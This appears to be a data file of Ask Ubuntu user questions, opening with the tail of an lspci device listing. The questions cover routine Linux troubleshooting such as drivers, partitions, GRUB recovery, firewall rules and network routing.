00000000d0100000-00000000d0afffff secondary status : 66mhz- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 06 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 0447 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin a routed to irq 23 region 0 : memory at fbf07000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : < access denied > kernel driver in use : ehci-pci 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev a6 ) ( prog-if 01 [ subtractive decode ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 bus : primary=00 , secondary=20 , subordinate=20 , sec-latency=32 secondary status : 66mhz- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort+ < serr- < perr- bridgectl : parity- serr- noisa- vga- mabort- > reset- fastb2b- pridisctmr- secdisctmr- disctmrstat- disctmrserren- capabilities : < access denied > 00:1f.0 isa bridge : intel corporation mobile 5 series chipset lpc interface controller ( rev 06 ) subsystem : dell device 0447 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 capabilities : < access denied > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation 5 series/3400 series chipset 6 port sata ahci controller ( rev 06 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : dell device 0447 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz+ udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 interrupt : pin b routed to irq 46 region 0 : i/o ports at f070 [ size=8 ] region 1 : i/o ports at f060 [ size=4 ] region 2 : i/o ports at f050 [ size=8 ] region 3 : i/o ports at f040 [ size=4 ] region 4 : i/o ports at f020 [ size=32 ] region 5 : memory at fbf06000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : < access denied > kernel driver in use : ahci 00:1f.3 smbus : intel corporation 5 series/3400 series chipset smbus controller ( rev 06 ) subsystem : dell device 0447 control : i/o+ mem+ busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b+ parerr- devsel=medium > tabort- < tabort- < mabort- > serr- < perr- intx- interrupt : pin c routed to irq 3 region 0 : memory at fbf05000 ( 64-bit , non-prefetchable ) [ size=256 ] region 4 : i/o ports at f000 [ size=32 ] 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] madison [ mobility radeon hd 5650/5750 / 6530m/6550m ] ( prog-if 00 [ vga controller ] ) subsystem : dell mobility radeon hd 5650 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 49 region 0 : memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] region 2 : memory at fbe20000 ( 64-bit , non-prefetchable ) [ size=128k ] region 4 : i/o ports at e000 [ size=256 ] expansion rom at fbe00000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : radeon 01:00.1 audio device : advanced micro devices , inc. [ amd/ati ] redwood hdmi audio [ radeon hd 5000 series ] subsystem : dell device 0447 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin b routed to irq 50 region 0 : memory at fbe40000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : snd_hda_intel 12:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) subsystem : dell inspiron m5010 / xps 8300 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 17 region 0 : memory at fbd00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : wl 13:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 02 ) subsystem : dell device 0447 control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx+ status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 45 region 0 : i/o ports at d000 [ size=256 ] region 2 : memory at d0c10000 ( 64-bit , prefetchable ) [ size=4k ] region 4 : memory at d0c00000 ( 64-bit , prefetchable ) [ size=64k ] expansion rom at fb300000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : r8169 ff:00.0 host bridge : intel corporation core processor quickpath architecture generic non-core registers ( rev 05 ) subsystem : intel corporation device 8086 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 ff:00.1 host bridge : intel corporation core processor quickpath architecture system address decoder ( rev 05 ) subsystem : intel corporation device 8086 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 ff:02.0 host bridge : intel corporation core processor qpi link 0 ( rev 05 ) subsystem : intel corporation device 8086 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 ff:02.1 host bridge : intel corporation core processor qpi physical 0 ( rev 05 ) subsystem : intel corporation device 8086 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 ff:02.2 host bridge : intel corporation core processor reserved ( rev 05 ) subsystem : intel corporation device 8086 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 ff:02.3 host bridge : intel corporation core processor reserved ( rev 05 ) subsystem : intel corporation device 8086 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- status : cap- 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- < tabort- < mabort- > serr- < perr- intx- latency : 0 thank you ...
440971	why ubuntu is not detecting my amd radeon graphics ?	i installed ubuntu 13.10 on my laptop hp pavilion dv6 6121se specs : intel core i7 2670qm 2.2 ghz amd radeon 6490m 512 mb intel hd 3000 512 mb 4 gb ram 500 gb hdd dual boot between windows 7 and this ubuntu . in 'about system' graphics : intel sandybridge mobile then why not amd radeon i want my gfx fully recoginzed what should i do ?
440974	compatible ubuntu version for old dell latitude d800	hi : i have a dell latitude , currently running win xp , but i want to change to linux . d800 pentium m ~1.7 ghz 1 gb ram 80 gb ide hd nvidia geforce fx go5200 graphics broadcom 570x wireless card i 'd like a fairly recent version , but one that 's not too `` heavy '' for an 11-year-old laptop . i understand this seems like a matter of opinion , but i 've read many posts about what does n't work , & am wondering if anyone knows of a subset of distros that do work in this case . thanx !
440975	how to install software offlinely in ubuntu ?	i am very new to the ubuntu . i install ubuntu 13.10 right now for first time . till now i used window xp . now i want to use ubuntu ( an open source ) . i want to know how software are downloaded in ubuntu offline ( without internet connection ) because i have no internet ? please guide me in simple & step by step manner .
440979	help running world of warcraft in ubuntu 13.10	i'e been trying to play world of warcraft on ubuntu . i even tried on mint . tried playonlinux , trial of crossover and just wine 1.6.2 and wine 1.7 can anyone give me some assistance . i 'm new to linux 64 bit ubuntu 13.10
440980	which file to add to /usr/local/bin from a program installed from source ?	i know that when i install a program from source is possible to make it run in terminal only by typing its name using these two ways copy executable file from home directory to /usr/local/bin . add its path to the path in ~/.bashrc file . which file ( or better to say which type of file ) from home directory i should add to /usr/local/bin ? please do not tell me just executable ! i saw a lot of executable files in my home/myprogram directory with this command : find . -perm -u+x -type f from how to find executables . also there is a file named myprogram . should i add this to /usr/local/bin ?
440982	how to check installed program version ?	how can i check installed program versions in terminal . is there any command for that , for example ver or something similar ?
440985	does anyone have titanfall up and running on ubuntu yet ?	seems like ubuntu is the best os but the lack of big games is unfortunate . does anyone got a walkthrough on getting titanfall specifically up and running on ubuntu with an nvidia card ?
440990	right arrow key problem in lubuntu 13.10	i have a problem with the right arrow of my keyboard ; it seems always pressed down . that is a big problem to me , for example when i listen to music and in many other situations . please keep in mind i am new to lubuntu : )
440991	on what partition is ubuntu installed ?	i want to reinstall windows 7 , but i donât know where ubuntu is installed . i want to format the windows 7 partition to remove all existing files , but i am afraid i will remove ubuntu by accident . i was looking , but i did n't understand anything : does this means that ubuntu is installed in the first volume here in windows : or are they both on the same volume ( c : ) ? looking at windows disk management , the first volume seems to be empty , so maybe ubuntu is installed in the same partition as windows ? in gparted it is shown as :
440994	using gufw create rule to reject traffic from specific subnet	i am connected to two networks one trusted , one not . untrusted range is 172.18.0.0/16 . ( i need some connectivity with it , but not all ports open . ) i would like to setup gufw to reject connections on port 22 and 443 ( and a few others ) to my pc . here is what i have for the 22 rule . i notice however that dmesg contains ufw logs . and it looks like its rejecting traffic in the other direction ? notice dst ( destination ) is my ip and spt ( source port ? ) is 443 . [ 1020925.168827 ] [ ufw block ] in=eth5 out= mac=00:1b : fc : fc:0d:28:00:1b:2f:97 : b5:86:08:00 src=74.125.233.85 dst=192.168.0.2 len=40 tos=0x00 prec=0x00 ttl=55 id=40036 proto=tcp spt=443 dpt=44658 window=0 res=0x00 rst urgp=0 output of # ufw status to action from -- -- -- -- -- -- 192.168.0.2 22/tcp reject 172.18.0.0/16 ( log-all ) 192.168.0.2 138 reject 172.18.0.0/16 ( log-all ) 192.168.0.2 139 reject 172.18.0.0/16 ( log-all ) 192.168.0.2 445 reject 172.18.0.0/16 ( log-all ) 192.168.0.2 49152 reject 172.18.0.0/16 ( log-all ) 192.168.0.2 80 reject 172.18.0.0/16 ( log-all ) 192.168.0.2 8080 reject 172.18.0.0/16 ( log-all ) 192.168.0.2 443/tcp reject 172.18.0.0/16 ( log-all ) 192.168.0.2 137/tcp reject 172.18.0.0/16 ( log-all ) 192.168.0.2 22 reject 172.26.0.0/16 ( log-all )
441000	error on downloading ubuntu 12.04 lts	i am getting an error : 500 internal server error when trying to download ubuntu 12.04 ! please resolve it as soon as possible i need ubuntu for my work !
441001	no video with support format and mime type found	i have just install ubuntu 12.04 . when i used firefox to open online videos , it did n't open . the error show that no video with support format and mime type found . who met this errors ?
441003	ubuntu 13.10 unable to detect windows 7 installed partition	i know this is being asked again and again , but it seems like there is no way out . i 'm really losing it now ! so here it goes : i built this below average rig yesterday : core i3 4130 3.4ghz [ 64bit ] seagate 1tb 4gig ram i put my bootable ubuntu pendrive , made using rufus , in and selected the option `` mbr for bios and uefi systems '' my windows 7 is on efi mode as checked on windows 7 partition tables i also tried shrinking the c : \ volume , didnt make any difference my hard drive is fresh and windows 7 was installed just a day before ok , so now : this is output for `` sudo fdisk -l '' ubuntu @ ubuntu : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 256 heads , 63 sectors/track , 121126 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 4294967295 2147483647+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdb : 8004 mb , 8004304896 bytes 255 heads , 63 sectors/track , 973 cylinders , total 15633408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x003156e6 device boot start end blocks id system /dev/sdb1 * 2048 15633407 7815680 c w95 fat32 ( lba ) the win7 and ubuntu 13.10 distros both are 64 bit . also it worked perfectly on my dell inspiron 15 with same win7 and ubuntu . i used only 195 gb of 1tb space for win7 and rest of it is still unallocated . i 'm sorry for reposting this question again ...
441008	grub rescue problem after formatting windows partion	hie , i have just switched to ubuntu , and have installed ubuntu 13.10 along with windows 7.at installation time i just gave 15gb to ubuntu , later on i decided to give my one of partition e : / to ubuntu , so deleted it and formatted it to ext4 through some disk application named `` disks '' in ubuntu.but this suddenly creates a lot problem to me . formatted partition is not being mounted . and prompt with following lines appear : error creating partition on /dev/sda : command-line `parted-align optimal-script `` /dev/sda '' mkpart logical ext2 384777mib 479045091327b '' exited with non zero exit status 1 : error : you requested a partition from 403gb to 479gb . the closest location we can manage is 403gb to 479gb . ( udisk-error-quark,0 ) when i rebooted system i have following error : filesystem unknown entering in rescue mode grub rescue > : which i solved with following commands set prefix= ( hd0 , msdos7 ) /boot/grub set root= ( hd0 , msdos7 ) insmod normal normal but now every time i boot system i have to type these commands manually . somebody help me out .please !
441010	i want to change some of the linux files , how to recompile the linux and reinstall it	i want to make changes to the kernel files /linux/net/ipv4/ip_output.c in my case . i want to add a script to be run that changes the payload of the data whenever a packet passes through the ip_local_output hook . now when i add that script , how do i recompile the kernel that make the changes operable .
441016	windows partition deletion and adding it to ubunu	hie , i have installed ubuntu 13.10 along with windows 7 . i'v deleted one of my windows drive ( e : ) through some app `` disks '' in ubuntu.but as i do 'create a new partition ' with type chosen as ext4.it gives following error : prompt with following lines appear : error creating partition on /dev/sda : command-line `parted-align optimal-script `` /dev/sda '' mkpart logical ext2 384777mib 479045091327b '' exited with non zero exit status 1 : error : you requested a prtition from 403gb to 479gb.the closest location we can manage is 403gb to 479gb. ( udisk-error-quark,0 ) . what is this all about ? is there anyway of adding any windows partition to ubuntu after installing it to system ? i'v also tried it by deleting it first through windows os , & than tryin to use that free space to make a ext4 partition in ubuntu , but same problem appears !
441019	cairo dock workspace switcher and weblet dissapear on minimize	today i discovered that there is a keyboard shortcut ( by default ) for minimizing windows in ubuntu 12.04 . the shortcut key is ctrl + alt + 0 . i was trying to minimize windows and suddenly i minimized cairo dock 's workspace switcher and weblet . i am unable to restore them now ! they are not appearing anywhere , neither in cairo-dock nor in the unity panel . how can i make them visible again ? i have tried to go through various discussion threads on internet , however nobody seems to have had this exact problem .
441020	i cant get my graphics to work properly	my ubuntu 12.04.04 cant boot unless i use the nomodeset parameter at boot time . but that way vesa drivers are loaded and my resolution is lower than expected . i have an intel sandy bridge processor with integrated graphics
441022	installing on old laptop	trying to install kubuntu on 8 yo toshiba laptop , but keep getting this error message : smbios implementation newer than 2.8 not fully supported how do i fix this ?
441029	will ubuntu 12.04 lts and an asrock x79 extreme 9 play nice together ?	i am traditionally a windows user with very limited expisure to ubuntu . i am having issues with activestate perl and strawberry pel for reasons unknown but it appears these issues will disappear when using ubuntu ... well at least i hope . before i go out nd purchase a new system ( which i need to do anyway ) i was wondering if anyone has used the above mothboard with ubuntu or i there are any issues i should be aware of ? cheers mr bigglesworth
441031	ca n't install ppa after switching to ubuntu	i installed 13.10 on a partition that had mint on it . when trying to add any ppa sudo add-apt-repository ppa : snwh/moka-gtk-theme-daily i get the following error : sh : 1 : /usr/lib/linuxmint/mintsources/mintsources.py : not found how can i point it to the right file ? thanks in advance . edit : i just found out that adding new ppas via the software and updates tool works . not a perfect solution , but it works .
441037	unnecessary accounts in ubuntu	it is recommended in hardening process that remove unnecessary accounts . what security problem exist with unnecessary user account ? are there recommended user accounts that should be removed ?
441038	problems getting 5.1 sorround to reciver [ hdmi link ]	first question here for me , probably wo n't be my last either . recently installed ubuntu without any issues and i 'm now happily running it instead of windows on all my computers in my home ( that 's 1 computer in total ) . i ran into a small problem yesterday tho . i ran a hdmi cable link from my pc to my receiver in the living room because i wanted to watch a film . only problem is , when it finaly started sending the sound out from the hdmi to my receiver the sound only came out in stereo . i ca n't seem to find where i can change the sound to 5.1 surround . i should note that the pc took sometime to 'reconise ' the correct hdmi cable to send the sound out thru . right now it 's connected with two hdmi cables . 1 to my pc monitor and 1 to my tv . the picture came asap , but i had to fiddle around to make it send the sound to the correct screen . basically it 's ' the same problem as this thanks on before for all the help !
441039	how do i initialize webcams without signing in to an x session ?	i 'm attempting to use opencv for a robotics project , and i 'd like to be able to capture from the webcam without having to log in to an x session on the host . currently i have to sign in through the gui login screen before any webcam will respond . for example , when i am using ssh with x forwarding and start cheese , it will say `` no device found , '' until i sign in on the host at which point launching cheese will stream the video as expected . i 'm relatively inexperienced in linux and i 'm hoping there 's some kind of startup script i can create that will initialize the webcam without logging in .
441040	failed to get size of gamma for output default when trying to add new screen resolution	i 'm trying to adjust resolution on my new msi gt70 2oc . in settings , only one resolution is available : 1920x1080 . this is fine , except that i need to decrease the resolution and make it more rectangular for the laptop to work well with my old pl-550 tablet . here 's what i do : cvt 1200 1000 60 # 1200x1000 59.91 hz ( cvt ) hsync : 62.19 khz ; pclk : 99.50 mhz modeline `` 1200x1000_60.00 '' 99.50 1200 1280 1400 1600 1000 1003 1013 1038 -hsync +vsync sudo xrandr -- newmode `` 1200_1000_60 '' 99.50 1200 1280 1400 1600 1000 1003 1013 1038 -hsync +vsync xrandr : failed to get size of gamma for output default how do i get past this step ? update here 's the output of xrandr : xrandr : failed to get size of gamma for output default screen 0 : minimum 1920 x 1080 , current 1920 x 1080 , maximum 1920 x 1080 default connected primary 1920x1080+0+0 0mm x 0mm 1920x1080 0.0*
441043	how to recover encrypted home with only login password ?	until data was n't lost i could login and use os as normal and access my home folder without entering any passphrase because it was automounted at login . now i want to access my home folder just by entering the login password as i always did when logging in.but i cant login anymore.. so how to access my home folder only knowing the login password ? in reply to jo-erlend schinstad : my situation is i cant login anymore because several system files have been corrupted due to usb problems.so i must use another os and because i do n't know my mount passphrase i must somehow access valuable files knowing only my login password .
441044	flash drive problem on usb 3.0 port	i bought usb 3.0 flash drive kingston dt r3.0 ( http : //usb.userbenchmark.com/kingston-datatraveler-r30-usb-30-16gb/rating/1435 & tab=review ) , but when i connected the drive to usb 3 port on my laptop i does n't work properly . drive is fat32 . ubuntu mounts the drive on usb 3.0 port , but when i try to copy something , copy operation freezes and drive disappears . if i connect the drive to usb 2.0 port , everything works just fine . if i format drive to ntfs/ext4 ( basically anything else then fat32 ) the drive works with usb3.0 and usb2.0 port as well . i need to use fat32 , because i use the drive on multiple machines ( ubuntu , windows , smarttv , my car radio , ... ) any ideas why my ubuntu 13.10 does n't read fat32 on usb 3.0 port from this flash drive ... ? ? ?
441045	how do i install a different version of subversion on lubuntu ?	when you install it from apt-get install svn the version is 1.6.17 the version in the ubuntu repository is 1.7.9 , which is what i need . how do i get that version on lubuntu ? i tried compiling from source , but kept getting error after error after needing a billion dependencies . lubuntu : xx @ xx-virtualbox : ~ $ apt-cache policy subversion subversion : installed : 1.6.17dfsg-3ubuntu3.3 candidate : 1.6.17dfsg-3ubuntu3.3 version table : *** 1.6.17dfsg-3ubuntu3.3 0 500 http : //au.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 100 /var/lib/dpkg/status 1.6.17dfsg-3ubuntu3 0 500 http : //au.archive.ubuntu.com/ubuntu/ precise/main amd64 packages ubuntu : ubuntu @ ubuntu-virtualbox : ~ $ apt-cache policy subversion subversion : installed : 1.7.9-1+nmu6ubuntu3 candidate : 1.7.9-1+nmu6ubuntu3 version table : *** 1.7.9-1+nmu6ubuntu3 0 500 http : //au.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages 100 /var/lib/dpkg/status
441047	dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) nginx	the software up-to-date option automatically download the upgrade for nginx . but while installing it 's giving me the following error : reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : nginx 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/434 kb of archives . after this operation , 977 kb of additional disk space will be used . ( reading database ... 291344 files and directories currently installed . ) unpacking nginx ( from ... /nginx_1.4.7-1~precise_amd64.deb ) ... -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- thanks for using nginx ! please find the official documentation for nginx here : * http : //nginx.org/en/docs/ commercial subscriptions for nginx are available on : * http : //nginx.com/products/ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- dpkg : error processing /var/cache/apt/archives/nginx_1.4.7-1~precise_amd64.deb ( -- unpack ) : trying to overwrite '/etc/logrotate.d/nginx ' , which is also in package nginx-common 1.4.6-1+precise0 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/nginx_1.4.7-1~precise_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) actually that file /etc/logrotate.d/nginx does not exist in this folder .
441050	installing ubuntu 12.04 fro already downloaded file ( installing with pendrive )	i have got this file downloaded : '' ubuntu-12.04.4-desktop-amd64 '' i have a 64 bit os and want to install ubuntu 12.04 on it alongside win 7 ( which i already ahve on the pc ) i have a pendrive . how do i install ubuntu using the already downloaded file ( given above ) and a pendrive ? thanks in advance 4 d help..
441052	incorrect duration time in audacious or any musical player when convert with ffmpeg or avconv	i have one strange problem which i ca n't figure out and it really drives me crazy . i was searching from a long time for this , but did n't find any adequate answers . it is about the time duration of converted mp3s with ffmpeg or avconv . i 'm using download helper in firefox to download and even convert any video file to mp3.. everything is going fine except the duration time of the mp3s in any music player ( i tried audacious , qmmp ) ... when i convert a video which is 3mins long in the player it shows around 18mins long . another thing i noticed is the wrong bitrate . it shows something around 32kbps , but i 'm using 192kbps when i convert the file ... i tried vlc which i use for video files and it shows the time correctly , but the bitrate in the codec section is also showing 32kbps . i noticed at first when i open the file with vlc is little kinda buffering the time but at last it shows it correctly . another thing i tried is the command ffmpeg -i file.mp3 which also shows the correct time duration and bitrate . the strange fact is when i export the same converted file with audacity without change anything it correctly appears in audacious with the correct time duration . may be audacity uses some other libs which corrects that bug . for information i have installed ffmpeg , libavcodec-extra-53 . ffmpeg -version ffmpeg 0.8.10-6:0.8.10-0ubuntu0.13.10.1 libavutil 51 . 22 . 2 / 51 . 22 . 2 libavcodec 53 . 35 . 0 / 53 . 35 . 0 libavformat 53 . 21 . 1 / 53 . 21 . 1 libavdevice 53 . 2 . 0 / 53 . 2 . 0 libavfilter 2 . 15 . 0 / 2 . 15 . 0 libswscale 2 . 1 . 0 / 2 . 1 . 0 libpostproc 52 . 0 . 0 / 52 . 0 . 0 using kubuntu 13.10 i386 . thanks in advance : ) edit : ok ... the solution was really simple.. as lordneckbeard said , i just downloaded the version from the official ffmpeg site and everything is correct now . i purge the repository version first and then just copy the version from the official site into /usr/bin/ ...
441053	nvidia driver problems	after install nvidia driver my pc is not working . i have installed it from ubuntu software center . after entered my login password , only black screen is appearing . please help to recover my system . now i do n't want install nvidia , i want to recover my system .
441055	how can i list files that the current user can access ?	for security auditing purposes i would like to go through my systems ' users and make sure they do n't have filesystem access to more than i 'd prefer they did . i 'd like something that outputs in the ls -l format like but for just one user ( and their groups ) : r-x /var r-x /var/spool r-x /var/spool/cron -- t /var/spool/cron/atjobs once i have a vetted list of what a user should be able to see , i can generate this again for other user and see how they differ . make sense ? i want to underline that this needs to evaluate the current user 's natural , group and even acl permissions . essentially testing each stage . i 'm not sure if i care about sticky bits and things like that over simple drwx but we 'll see where this goes : )
441060	how do i stop this from appearing when i boot up my laptop ? ( screenshot )	it appears everytime i boot up my laptop and i always click `` run this action now '' but nothing changes
441061	what does vi stand for ?	i was just wondering what `` vi '' means in linux ( the command used for editing files ) ?
441066	if i install ubuntu as a dual boot , and then afterwards want to use ubuntu as a single boot , will i lose my programs , data and files ?	i want to retain my files , programs and data from windows xp . i prefer to do a clean boot , but i do not want to lose my programs , files and data . many of my programs were downloaded and i may not have the ability to download them again for free . since windows xp is being stopped , i do not want to setup a dual boot of ubuntu and windows xp . what can i do to ensure that my programs , files and data will be transferred to ubuntu on a single boot ?
441068	trackpad on thinkpad w540 not working properly	i just bought a lenovo thinkpad w540 and installed ubuntu on it , migrating from mac os . i notice that the trackpad on this computer is basically one big key that can be pressed anywhere on its surface , not just at the usual space allocated for buttons at the bottom of the trackpad . under ubuntu , the track pad seems poorly configured , and when i click the cursor tends to jump out of place . is there a way to solve this issue ? please let me know if i need to provide any further information regarding my system . thank you .
441072	ca n't select anything in the input method tab	as you can see in the image , i ca n't select anything . what should i do ? i use kubuntu 13.10 , kde 4.12.3 and want to use ibus-bogo as my vietnamese input . my command to install ibus is : sudo apt-get install ibus ibus-qt4 ibus-bogo libibus-qt1 gir1.2-ibus-1.0 ibus-gtk ibus-gtk3 libibus-1.0-5 gir1.2-gtk-3.0 language-pack-vi language-pack-gnome-vi i have installed ibus-m17n
441076	nm-connection-manager `` shared connection '' does not route to inner network	i 'm using a raspberry pi to share it 's wifi connection with an ethernet-switch . in the connection manager , i set the eth0-interface to shared , so it would use the wlan0-interface as the internet connection . internet access from the ethernet works , but i am not able to access any of the workstations in the ethernet from the wifi , even though i set a static route on the router which routes the wifi-network . this is my setup : wifi network : 192.168.178.0/24 , the raspberry has the static address 192.168.178.251 ethernet network : 10.42.0.0/24 , the raspberry is the router here with 10.42.0.1 ping results : ethernet - > wifi works without any problems wifi - > ethernet is like this : $ ping 10.42.0.83 ping 10.42.0.83 ( 10.42.0.83 ) 56 ( 84 ) bytes of data . from 192.168.178.1 : icmp_seq=1 redirect host ( new nexthop : 192.168.178.251 ) from 192.168.178.1 icmp_seq=1 redirect hostfrom 192.168.178.251 icmp_seq=1 destination port unreachable from 192.168.178.251 icmp_seq=2 destination port unreachable from 192.168.178.251 icmp_seq=3 destination port unreachable from 192.168.178.251 icmp_seq=4 destination port unreachable ^c -- - 10.42.0.83 ping statistics -- - 4 packets transmitted , 0 received , +5 errors , 100 % packet loss , time 3003ms except for the raspberry itself : $ ping 10.42.0.1 ping 10.42.0.1 ( 10.42.0.1 ) 56 ( 84 ) bytes of data . from 192.168.178.1 : icmp_seq=1 redirect host ( new nexthop : 192.168.178.251 ) from 192.168.178.1 icmp_seq=1 redirect host64 bytes from 10.42.0.1 : icmp_req=1 ttl=64 time=44.8 ms 64 bytes from 10.42.0.1 : icmp_req=2 ttl=64 time=269 ms 64 bytes from 10.42.0.1 : icmp_req=3 ttl=64 time=88.6 ms 64 bytes from 10.42.0.1 : icmp_req=4 ttl=64 time=111 ms [ ... ] ^c -- - 10.42.0.1 ping statistics -- - 10 packets transmitted , 10 received , +1 errors , 0 % packet loss , time 9010ms rtt min/avg/max/mdev = 19.821/84.037/269.677/68.191 ms i took a look into the routing table of the raspi , since the problem seems to lie there : $ route -n kernel-ip-routingtable target router genmask flags metric ref use iface 0.0.0.0 192.168.178.1 0.0.0.0 ug 0 0 0 wlan0 10.42.0.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 192.168.178.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0 and $ ip route show default via 192.168.178.1 dev wlan0 10.42.0.0/24 dev eth0 scope link 192.168.178.0/24 dev wlan0 proto kernel scope link src 192.168.178.251 i think the problem is , that the scope of the route to the ethernet is 'link ' , but as much as i looked into the manpages and at examples , i was n't able to change that to 'global ' . i want to be able to set up a nas or another server of some kind in the ethernet-network so it really bothers me that it is n't accessible from the wifi . i have full access to the raspi via ssh and vnc . edit : solved , just had to flush the iptables , the packets somehow got filtered out ...
441078	scaling on thinkpad w540	i 'm running ubuntu on a lenovo w540 with a screen resolution of 2880x1629 ( 16:9 ) . everything in the interface is very small : text hardly legible , buttons minuscule etc . is there any way to scale everything in the interface to make it easier to use at higher resolutions such as this one ? thank you very much .
